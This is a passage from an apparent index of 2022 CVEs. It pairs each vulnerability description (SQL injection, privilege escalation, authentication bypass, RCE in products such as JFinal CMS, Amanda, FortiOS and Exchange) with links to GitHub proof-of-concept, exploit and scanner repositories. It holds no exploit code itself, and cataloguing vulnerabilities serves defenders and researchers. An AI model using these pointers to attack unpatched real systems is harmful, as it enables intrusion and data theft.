- [AgainstTheLight/CVE-2022-37201](https://github.com/AgainstTheLight/CVE-2022-37201)
### CVE-2022-37202 (2022-10-26)
JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/advicefeedback/list
- [AgainstTheLight/CVE-2022-37202](https://github.com/AgainstTheLight/CVE-2022-37202)
### CVE-2022-37203 (2022-09-19)
JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.
- [AgainstTheLight/CVE-2022-37203](https://github.com/AgainstTheLight/CVE-2022-37203)
### CVE-2022-37204 (2022-09-20)
Final CMS 5.1.0 is vulnerable to SQL Injection.
- [AgainstTheLight/CVE-2022-37204](https://github.com/AgainstTheLight/CVE-2022-37204)
### CVE-2022-37205 (2022-09-20)
JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.
- [AgainstTheLight/CVE-2022-37205](https://github.com/AgainstTheLight/CVE-2022-37205)
### CVE-2022-37206
- [AgainstTheLight/CVE-2022-37206](https://github.com/AgainstTheLight/CVE-2022-37206)
### CVE-2022-37207 (2022-09-15)
JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection
- [AgainstTheLight/CVE-2022-37207](https://github.com/AgainstTheLight/CVE-2022-37207)
### CVE-2022-37208 (2022-10-13)
JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.
- [AgainstTheLight/CVE-2022-37208](https://github.com/AgainstTheLight/CVE-2022-37208)
### CVE-2022-37209 (2022-09-27)
JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.
- [AgainstTheLight/CVE-2022-37209](https://github.com/AgainstTheLight/CVE-2022-37209)
### CVE-2022-37210
- [AgainstTheLight/CVE-2022-37210](https://github.com/AgainstTheLight/CVE-2022-37210)
### CVE-2022-37298 (2022-10-20)
Shinken Solutions Shinken Monitoring Version 2.4.3 affected is vulnerable to Incorrect Access Control. The SafeUnpickler class found in shinken/safepickle.py implements a weak authentication scheme when unserializing objects passed from monitoring nodes to the Shinken monitoring server.
- [dbyio/cve-2022-37298](https://github.com/dbyio/cve-2022-37298)
### CVE-2022-37332 (2022-11-21)
A use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 12.0.1.12430. A specially-crafted PDF document can trigger the reuse of previously freed memory via misusing media player API, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.
- [SpiralBL0CK/CVE-2022-37332-RCE-](https://github.com/SpiralBL0CK/CVE-2022-37332-RCE-)
### CVE-2022-37434 (2022-08-05)
zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).
- [xen0bit/CVE-2022-37434_poc](https://github.com/xen0bit/CVE-2022-37434_poc)
- [Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434)
- [Trinadh465/external_zlib_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_CVE-2022-37434)
### CVE-2022-37703 (2022-09-13)
In Amanda 3.5.1, an information leak vulnerability was found in the calcsize SUID binary. An attacker can abuse this vulnerability to know if a directory exists or not anywhere in the fs. The binary will use `opendir()` as root directly without checking the path, letting the attacker provide an arbitrary path.
- [MaherAzzouzi/CVE-2022-37703](https://github.com/MaherAzzouzi/CVE-2022-37703)
### CVE-2022-37704 (2023-04-16)
Amanda 3.5.1 allows privilege escalation from the regular user backup to root. The SUID binary located at /lib/amanda/rundump will execute /usr/sbin/dump as root with controlled arguments from the attacker which may lead to escalation of privileges, denial of service, and information disclosure.
- [MaherAzzouzi/CVE-2022-37704](https://github.com/MaherAzzouzi/CVE-2022-37704)
### CVE-2022-37705 (2023-04-16)
A privilege escalation flaw was found in Amanda 3.5.1 in which the backup user can acquire root privileges. The vulnerable component is the runtar SUID program, which is a wrapper to run /usr/bin/tar with specific arguments that are controllable by the attacker. This program mishandles the arguments passed to tar binary (it expects that the argument name and value are separated with a space; however, separating them with an equals sign is also supported),
- [MaherAzzouzi/CVE-2022-37705](https://github.com/MaherAzzouzi/CVE-2022-37705)
### CVE-2022-37706 (2022-12-25)
enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.
- [MaherAzzouzi/CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)
- [ECU-10525611-Xander/CVE-2022-37706](https://github.com/ECU-10525611-Xander/CVE-2022-37706)
- [junnythemarksman/CVE-2022-37706](https://github.com/junnythemarksman/CVE-2022-37706)
- [AleksPwn/CVE-2022-37706](https://github.com/AleksPwn/CVE-2022-37706)
- [TACTICAL-HACK/CVE-2022-37706-SUID](https://github.com/TACTICAL-HACK/CVE-2022-37706-SUID)
- [sanan2004/CVE-2022-37706](https://github.com/sanan2004/CVE-2022-37706)
- [KaoXx/CVE-2022-37706](https://github.com/KaoXx/CVE-2022-37706)
### CVE-2022-37708
- [thekevinday/docker_lightman_exploit](https://github.com/thekevinday/docker_lightman_exploit)
### CVE-2022-37969 (2022-09-13)
Windows Common Log File System Driver Elevation of Privilege Vulnerability
- [fortra/CVE-2022-37969](https://github.com/fortra/CVE-2022-37969)
### CVE-2022-38029 (2022-10-11)
Windows ALPC Elevation of Privilege Vulnerability
- [SpiralBL0CK/SIDECHANNEL-CVE-2022-38029](https://github.com/SpiralBL0CK/SIDECHANNEL-CVE-2022-38029)
### CVE-2022-38181 (2022-10-25)
The Arm Mali GPU kernel driver allows unprivileged users to access freed memory because GPU memory operations are mishandled. This affects Bifrost r0p0 through r38p1, and r39p0; Valhall r19p0 through r38p1, and r39p0; and Midgard r4p0 through r32p0.
- [Pro-me3us/CVE_2022_38181_Raven](https://github.com/Pro-me3us/CVE_2022_38181_Raven)
- [Pro-me3us/CVE_2022_38181_Gazelle](https://github.com/Pro-me3us/CVE_2022_38181_Gazelle)
- [R0rt1z2/CVE-2022-38181](https://github.com/R0rt1z2/CVE-2022-38181)
### CVE-2022-38374 (2022-11-02)
A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiADC 7.0.0 - 7.0.2 and 6.2.0 - 6.2.4 allows an attacker to execute unauthorized code or commands via the URL and User fields observed in the traffic and event logviews.
- [azhurtanov/CVE-2022-38374](https://github.com/azhurtanov/CVE-2022-38374)
- [M4fiaB0y/CVE-2022-38374](https://github.com/M4fiaB0y/CVE-2022-38374)
### CVE-2022-38553 (2022-09-26)
Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.
- [4websecurity/CVE-2022-38553](https://github.com/4websecurity/CVE-2022-38553)
### CVE-2022-38577 (2022-09-19)
ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators.
- [sornram9254/CVE-2022-38577-Processmaker](https://github.com/sornram9254/CVE-2022-38577-Processmaker)
### CVE-2022-38601
- [jet-pentest/CVE-2022-38601](https://github.com/jet-pentest/CVE-2022-38601)
### CVE-2022-38604 (2023-04-11)
Wacom Driver 6.3.46-1 for Windows and lower was discovered to contain an arbitrary file deletion vulnerability.
- [LucaBarile/CVE-2022-38604](https://github.com/LucaBarile/CVE-2022-38604)
### CVE-2022-38691
- [TomKing062/CVE-2022-38691_38692](https://github.com/TomKing062/CVE-2022-38691_38692)
### CVE-2022-38694
- [TomKing062/CVE-2022-38694_unlock_bootloader](https://github.com/TomKing062/CVE-2022-38694_unlock_bootloader)
- [TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820](https://github.com/TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820)
### CVE-2022-38725 (2023-01-23)
An integer overflow in the RFC3164 parser in One Identity syslog-ng 3.0 through 3.37 allows remote attackers to cause a Denial of Service via crafted syslog input that is mishandled by the tcp or network function. syslog-ng Premium Edition 7.0.30 and syslog-ng Store Box 6.10.0 are also affected.
- [wdahlenburg/CVE-2022-38725](https://github.com/wdahlenburg/CVE-2022-38725)
### CVE-2022-38766 (2023-01-03)
The remote keyless system on Renault ZOE 2021 vehicles sends 433.92 MHz RF signals from the same Rolling Codes set for each door-open request, which allows for a replay attack.
- [MalHyuk/CVE-2022-38766](https://github.com/MalHyuk/CVE-2022-38766)
### CVE-2022-38789 (2022-09-15)
An issue was discovered in Airties Smart Wi-Fi before 2020-08-04. It allows attackers to change the main/guest SSID and the PSK to arbitrary values, and map the LAN, because of Insecure Direct Object Reference.
- [ProxyStaffy/Airties-CVE-2022-38789](https://github.com/ProxyStaffy/Airties-CVE-2022-38789)
### CVE-2022-38813 (2022-11-25)
PHPGurukul Blood Donor Management System 1.0 does not properly restrict access to admin/dashboard.php, which allows attackers to access all data of users, delete the users, add and manage Blood Group, and Submit Report.
- [RashidKhanPathan/CVE-2022-38813](https://github.com/RashidKhanPathan/CVE-2022-38813)
### CVE-2022-39066 (2022-11-22)
There is a SQL injection vulnerability in ZTE MF286R. Due to insufficient validation of the input parameters of the phonebook interface, an authenticated attacker could use the vulnerability to execute arbitrary SQL injection.
- [v0lp3/CVE-2022-39066](https://github.com/v0lp3/CVE-2022-39066)
### CVE-2022-39073 (2023-01-06)
There is a command injection vulnerability in ZTE MF286R, Due to insufficient validation of the input parameters, an attacker could use the vulnerability to execute arbitrary commands.
- [v0lp3/CVE-2022-39073](https://github.com/v0lp3/CVE-2022-39073)
### CVE-2022-39196 (2022-09-04)
Blackboard Learn 1.10.1 allows remote authenticated users to read unintended files by entering student credentials and then directly visiting a certain webapps/bbcms/execute/ URL. Note: The vendor disputes this stating this cannot be reproduced.
- [DayiliWaseem/CVE-2022-39196-](https://github.com/DayiliWaseem/CVE-2022-39196-)
### CVE-2022-39197 (2022-09-22)
An XSS (Cross Site Scripting) vulnerability was found in HelpSystems Cobalt Strike through 4.7 that allowed a remote attacker to execute HTML on the Cobalt Strike teamserver. To exploit the vulnerability, one must first inspect a Cobalt Strike payload, and then modify the username field in the payload (or create a new payload with the extracted information and then modify that username field to be malformed).
- [safe3s/CVE-2022-39197](https://github.com/safe3s/CVE-2022-39197)
- [zeoday/cobaltstrike4.5_cdf-1](https://github.com/zeoday/cobaltstrike4.5_cdf-1)
- [burpheart/cve-2022-39197](https://github.com/burpheart/cve-2022-39197)
- [xzajyjs/CVE-2022-39197-POC](https://github.com/xzajyjs/CVE-2022-39197-POC)
- [yqcs/CSPOC](https://github.com/yqcs/CSPOC)
- [purple-WL/Cobaltstrike-RCE-CVE-2022-39197](https://github.com/purple-WL/Cobaltstrike-RCE-CVE-2022-39197)
- [lovechoudoufu/about_cobaltstrike4.5_cdf](https://github.com/lovechoudoufu/about_cobaltstrike4.5_cdf)
- [burpheart/CVE-2022-39197-patch](https://github.com/burpheart/CVE-2022-39197-patch)
- [hluwa/cobaltstrike_swing_xss2rce](https://github.com/hluwa/cobaltstrike_swing_xss2rce)
- [4nth0ny1130/CVE-2022-39197-fix_patch](https://github.com/4nth0ny1130/CVE-2022-39197-fix_patch)
- [its-arun/CVE-2022-39197](https://github.com/its-arun/CVE-2022-39197)
- [TheCryingGame/CVE-2022-39197-RCE](https://github.com/TheCryingGame/CVE-2022-39197-RCE)
- [adeljck/CVE-2022-39197](https://github.com/adeljck/CVE-2022-39197)
- [xiao-zhu-zhu/pig_CS4.4](https://github.com/xiao-zhu-zhu/pig_CS4.4)
- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test)
### CVE-2022-39227 (2022-09-23)
python-jwt is a module for generating and verifying JSON Web Tokens. Versions prior to 3.3.4 are subject to Authentication Bypass by Spoofing, resulting in identity spoofing, session hijacking or authentication bypass. An attacker who obtains a JWT can arbitrarily forge its contents without knowing the secret key. Depending on the application, this may for example enable the attacker to spoof other user's identities, hijack their sessions, or bypass authentication. Users should upgrade to version 3.3.4. There are no known workarounds.
- [user0x1337/CVE-2022-39227](https://github.com/user0x1337/CVE-2022-39227)
- [NoSpaceAvailable/CVE-2022-39227](https://github.com/NoSpaceAvailable/CVE-2022-39227)
### CVE-2022-39253 (2022-10-19)
Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `--recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `--local` optimization when on a shared machine, either by passing the `--no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `--recurse-submodules` or run `git config --global protocol.file.allow user`.
- [ssst0n3/docker-cve-2022-39253-poc](https://github.com/ssst0n3/docker-cve-2022-39253-poc)
- [HiImDarwin/NetworkSecurityFinalProject](https://github.com/HiImDarwin/NetworkSecurityFinalProject)
### CVE-2022-39299 (2022-10-12)
Passport-SAML is a SAML 2.0 authentication provider for Passport, the Node.js authentication library. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g without access to a valid user) might also be feasible if generation of a signed message can be triggered. Users should upgrade to passport-saml version 3.2.2 or newer. The issue was also present in the beta releases of `node-saml` before version 4.0.0-beta.5. If you cannot upgrade, disabling SAML authentication may be done as a workaround.
- [doyensec/CVE-2022-39299_PoC_Generator](https://github.com/doyensec/CVE-2022-39299_PoC_Generator)
### CVE-2022-39425 (2022-10-18)
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [bob11vrdp/CVE-2022-39425](https://github.com/bob11vrdp/CVE-2022-39425)
### CVE-2022-39802 (2022-10-11)
SAP Manufacturing Execution - versions 15.1, 15.2, 15.3, allows an attacker to exploit insufficient validation of a file path request parameter. The intended file path can be manipulated to allow arbitrary traversal of directories on the remote server. The file content within each directory can be read which may lead to information disclosure.
- [vah13/CVE-2022-39802](https://github.com/vah13/CVE-2022-39802)
- [redrays-io/CVE-2022-39802](https://github.com/redrays-io/CVE-2022-39802)
### CVE-2022-39838 (2022-09-05)
Systematic FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via a UNC share pathname, and also allows absolute path traversal to local pathnames.
- [jet-pentest/CVE-2022-39838](https://github.com/jet-pentest/CVE-2022-39838)
### CVE-2022-39841
- [stealthcopter/CVE-2022-39841](https://github.com/stealthcopter/CVE-2022-39841)
### CVE-2022-39952 (2023-02-16)
A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.
- [horizon3ai/CVE-2022-39952](https://github.com/horizon3ai/CVE-2022-39952)
- [shiyeshu/CVE-2022-39952_webshell](https://github.com/shiyeshu/CVE-2022-39952_webshell)
- [Chocapikk/CVE-2022-39952](https://github.com/Chocapikk/CVE-2022-39952)
- [dkstar11q/CVE-2022-39952-better](https://github.com/dkstar11q/CVE-2022-39952-better)
### CVE-2022-39959 (2022-10-07)
Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file.
- [usmarine2141/CVE-2022-39959](https://github.com/usmarine2141/CVE-2022-39959)
### CVE-2022-39986 (2023-08-01)
A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
- [mind2hex/CVE-2022-39986](https://github.com/mind2hex/CVE-2022-39986)
- [tucommenceapousser/RaspAP-CVE-2022-39986-PoC](https://github.com/tucommenceapousser/RaspAP-CVE-2022-39986-PoC)
### CVE-2022-39987 (2023-08-01)
A Command injection vulnerability in RaspAP 2.8.0 thru 2.9.2 allows an authenticated attacker to execute arbitrary OS commands as root via the "entity" POST parameters in /ajax/networking/get_wgkey.php.
- [miguelc49/CVE-2022-39987-2](https://github.com/miguelc49/CVE-2022-39987-2)
- [miguelc49/CVE-2022-39987-1](https://github.com/miguelc49/CVE-2022-39987-1)
- [miguelc49/CVE-2022-39987-3](https://github.com/miguelc49/CVE-2022-39987-3)
### CVE-2022-40032 (2023-02-17)
SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.
- [h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated)
### CVE-2022-40126 (2022-09-29)
A misconfiguration in the Service Mode profile directory of Clash for Windows v0.19.9 allows attackers to escalate privileges and execute arbitrary commands when Service Mode is activated.
- [LovelyWei/CVE-2022-40126](https://github.com/LovelyWei/CVE-2022-40126)
### CVE-2022-40127 (2022-11-14)
A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
- [Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127)
- [jakabakos/CVE-2022-40127-Airflow-RCE](https://github.com/jakabakos/CVE-2022-40127-Airflow-RCE)
### CVE-2022-40140 (2022-09-19)
An origin validation error vulnerability in Trend Micro Apex One and Apex One as a Service could allow a local attacker to cause a denial-of-service on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
- [mr-r3b00t/NotProxyShellHunter](https://github.com/mr-r3b00t/NotProxyShellHunter)
- [ZephrFish/NotProxyShellScanner](https://github.com/ZephrFish/NotProxyShellScanner)
- [ipsBruno/CVE-2022-40140-SCANNER](https://github.com/ipsBruno/CVE-2022-40140-SCANNER)
### CVE-2022-40146 (2022-09-22)
Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14.
- [cckuailong/CVE-2022-40146_Exploit_Jar](https://github.com/cckuailong/CVE-2022-40146_Exploit_Jar)
- [soulfoodisgood/CVE-2022-40146](https://github.com/soulfoodisgood/CVE-2022-40146)
### CVE-2022-40297 (2022-09-08)
UBports Ubuntu Touch 16.04 allows the screen-unlock passcode to be used for a privileged shell via Sudo. This passcode is only four digits, far below typical length/complexity for a user account's password. NOTE: a third party states "The described attack cannot be executed as demonstrated.
- [filipkarc/PoC-ubuntutouch-pin-privesc](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc)
### CVE-2022-40317 (2022-09-09)
OpenKM 6.3.11 allows stored XSS related to the javascript: substring in an A element.
- [izdiwho/CVE-2022-40317](https://github.com/izdiwho/CVE-2022-40317)
### CVE-2022-40347 (2023-02-17)
SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information.
- [h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated)
### CVE-2022-40348 (2023-02-18)
Cross Site Scripting (XSS) vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'name' and 'email' parameters, allows attackers to execute arbitrary code.
- [h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated)
### CVE-2022-40363 (2022-09-29)
A buffer overflow in the component nfc_device_load_mifare_ul_data of Flipper Devices Inc., Flipper Zero before v0.65.2 allows attackers to cause a Denial of Service (DoS) via a crafted NFC file.
- [Olafdaf/CVE-2022-40363](https://github.com/Olafdaf/CVE-2022-40363)
### CVE-2022-40470 (2022-11-21)
Phpgurukul Blood Donor Management System 1.0 allows Cross Site Scripting via Add Blood Group Name Feature.
- [RashidKhanPathan/CVE-2022-40470](https://github.com/RashidKhanPathan/CVE-2022-40470)
### CVE-2022-40471 (2022-10-31)
Remote Code Execution in Clinic's Patient Management System v 1.0 allows Attacker to Upload arbitrary php webshell via profile picture upload functionality in users.php
- [RashidKhanPathan/CVE-2022-40471](https://github.com/RashidKhanPathan/CVE-2022-40471)
### CVE-2022-40490
- [whitej3rry/CVE-2022-40490](https://github.com/whitej3rry/CVE-2022-40490)
### CVE-2022-40494 (2022-10-06)
NPS before v0.26.10 was discovered to contain an authentication bypass vulnerability via constantly generating and sending the Auth key and Timestamp parameters.
- [carr0t2/nps-auth-bypass](https://github.com/carr0t2/nps-auth-bypass)
### CVE-2022-40624 (2022-12-20)
pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header, a different vulnerability than CVE-2022-31814.
- [dhammon/pfBlockerNg-CVE-2022-40624](https://github.com/dhammon/pfBlockerNg-CVE-2022-40624)
### CVE-2022-40634 (2022-09-13)
Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker SSTI.
- [mbadanoiu/CVE-2022-40634](https://github.com/mbadanoiu/CVE-2022-40634)
### CVE-2022-40635 (2022-09-13)
Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via Groovy Sandbox Bypass.
- [mbadanoiu/CVE-2022-40635](https://github.com/mbadanoiu/CVE-2022-40635)
### CVE-2022-40684 (2022-10-18)
An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
- [horizon3ai/CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)
- [carlosevieira/CVE-2022-40684](https://github.com/carlosevieira/CVE-2022-40684)
- [Filiplain/Fortinet-PoC-Auth-Bypass](https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass)
- [kljunowsky/CVE-2022-40684-POC](https://github.com/kljunowsky/CVE-2022-40684-POC)
- [secunnix/CVE-2022-40684](https://github.com/secunnix/CVE-2022-40684)
- [iveresk/CVE-2022-40684](https://github.com/iveresk/CVE-2022-40684)
- [mhd108/CVE-2022-40684](https://github.com/mhd108/CVE-2022-40684)
- [ClickCyber/cve-2022-40684](https://github.com/ClickCyber/cve-2022-40684)
- [Chocapikk/CVE-2022-40684](https://github.com/Chocapikk/CVE-2022-40684)
- [mohamedbenchikh/CVE-2022-40684](https://github.com/mohamedbenchikh/CVE-2022-40684)
- [HAWA771/CVE-2022-40684](https://github.com/HAWA771/CVE-2022-40684)
- [NeriaBasha/CVE-2022-40684](https://github.com/NeriaBasha/CVE-2022-40684)
- [Grapphy/fortipwn](https://github.com/Grapphy/fortipwn)
- [puckiestyle/CVE-2022-40684](https://github.com/puckiestyle/CVE-2022-40684)
- [jsongmax/Fortinet-CVE-2022-40684](https://github.com/jsongmax/Fortinet-CVE-2022-40684)
- [und3sc0n0c1d0/CVE-2022-40684](https://github.com/und3sc0n0c1d0/CVE-2022-40684)
- [qingsiweisan/CVE-2022-40684](https://github.com/qingsiweisan/CVE-2022-40684)
- [TaroballzChen/CVE-2022-40684-metasploit-scanner](https://github.com/TaroballzChen/CVE-2022-40684-metasploit-scanner)
- [gustavorobertux/gotigate](https://github.com/gustavorobertux/gotigate)
- [hughink/CVE-2022-40684](https://github.com/hughink/CVE-2022-40684)
- [notareaperbutDR34P3r/CVE-2022-40684-Rust](https://github.com/notareaperbutDR34P3r/CVE-2022-40684-Rust)
- [z-bool/CVE-2022-40684](https://github.com/z-bool/CVE-2022-40684)
- [Anthony1500/CVE-2022-40684](https://github.com/Anthony1500/CVE-2022-40684)
### CVE-2022-40687 (2022-11-18)
Cross-Site Request Forgery (CSRF) vulnerability in Creative Mail plugin <= 1.5.4 on WordPress.
- [williamkhepri/CVE-2022-40687-metasploit-scanner](https://github.com/williamkhepri/CVE-2022-40687-metasploit-scanner)
### CVE-2022-40769 (2022-09-18)
profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022.
- [PLSRcoin/CVE-2022-40769](https://github.com/PLSRcoin/CVE-2022-40769)
### CVE-2022-40799 (2022-11-29)
Data Integrity Failure in 'Backup Config' in D-Link DNR-322L <= 2.60B15 allows an authenticated attacker to execute OS level commands on the device.
- [rtfmkiesel/CVE-2022-40799](https://github.com/rtfmkiesel/CVE-2022-40799)
### CVE-2022-40881 (2022-11-17)
SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php
- [yilin1203/CVE-2022-40881](https://github.com/yilin1203/CVE-2022-40881)
### CVE-2022-40916
- [whitej3rry/CVE-2022-40916](https://github.com/whitej3rry/CVE-2022-40916)
### CVE-2022-41032 (2022-10-11)
NuGet Client Elevation of Privilege Vulnerability
- [ethomson/cve-2022-41032](https://github.com/ethomson/cve-2022-41032)
### CVE-2022-41034 (2022-10-11)
Visual Studio Code Remote Code Execution Vulnerability
- [andyhsu024/CVE-2022-41034](https://github.com/andyhsu024/CVE-2022-41034)
### CVE-2022-41040 (2022-10-03)
Microsoft Exchange Server Elevation of Privilege Vulnerability
- [numanturle/CVE-2022-41040](https://github.com/numanturle/CVE-2022-41040)
- [CentarisCyber/CVE-2022-41040_Mitigation](https://github.com/CentarisCyber/CVE-2022-41040_Mitigation)
- [r3dcl1ff/CVE-2022-41040](https://github.com/r3dcl1ff/CVE-2022-41040)
- [d3duct1v/CVE-2022-41040](https://github.com/d3duct1v/CVE-2022-41040)
- [kljunowsky/CVE-2022-41040-POC](https://github.com/kljunowsky/CVE-2022-41040-POC)
- [rjsudlow/proxynotshell-IOC-Checker](https://github.com/rjsudlow/proxynotshell-IOC-Checker)
- [ITPATJIDR/CVE-2022-41040](https://github.com/ITPATJIDR/CVE-2022-41040)
- [TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)
### CVE-2022-41049 (2022-11-09)
Windows Mark of the Web Security Feature Bypass Vulnerability
- [Nathan01110011/CVE-2022-41049-POC](https://github.com/Nathan01110011/CVE-2022-41049-POC)
### CVE-2022-41080 (2022-11-09)
Microsoft Exchange Server Elevation of Privilege Vulnerability
- [ohnonoyesyes/CVE-2022-41080](https://github.com/ohnonoyesyes/CVE-2022-41080)
### CVE-2022-41082 (2022-10-03)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [Diverto/nse-exchange](https://github.com/Diverto/nse-exchange)
- [notareaperbutDR34P3r/http-vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/http-vuln-CVE-2022-41082)
- [sikkertech/CVE-2022-41082](https://github.com/sikkertech/CVE-2022-41082)
- [balki97/OWASSRF-CVE-2022-41082-POC](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC)
- [bigherocenter/CVE-2022-41082-POC](https://github.com/bigherocenter/CVE-2022-41082-POC)
- [notareaperbutDR34P3r/vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/vuln-CVE-2022-41082)
- [SUPRAAA-1337/CVE-2022-41082](https://github.com/SUPRAAA-1337/CVE-2022-41082)
- [soltanali0/CVE-2022-41082](https://github.com/soltanali0/CVE-2022-41082)
### CVE-2022-41099 (2022-11-09)
BitLocker Security Feature Bypass Vulnerability
- [halsey51013/UpdateWindowsRE-CVE-2022-41099](https://github.com/halsey51013/UpdateWindowsRE-CVE-2022-41099)
- [o0MattE0o/CVE-2022-41099-Fix](https://github.com/o0MattE0o/CVE-2022-41099-Fix)
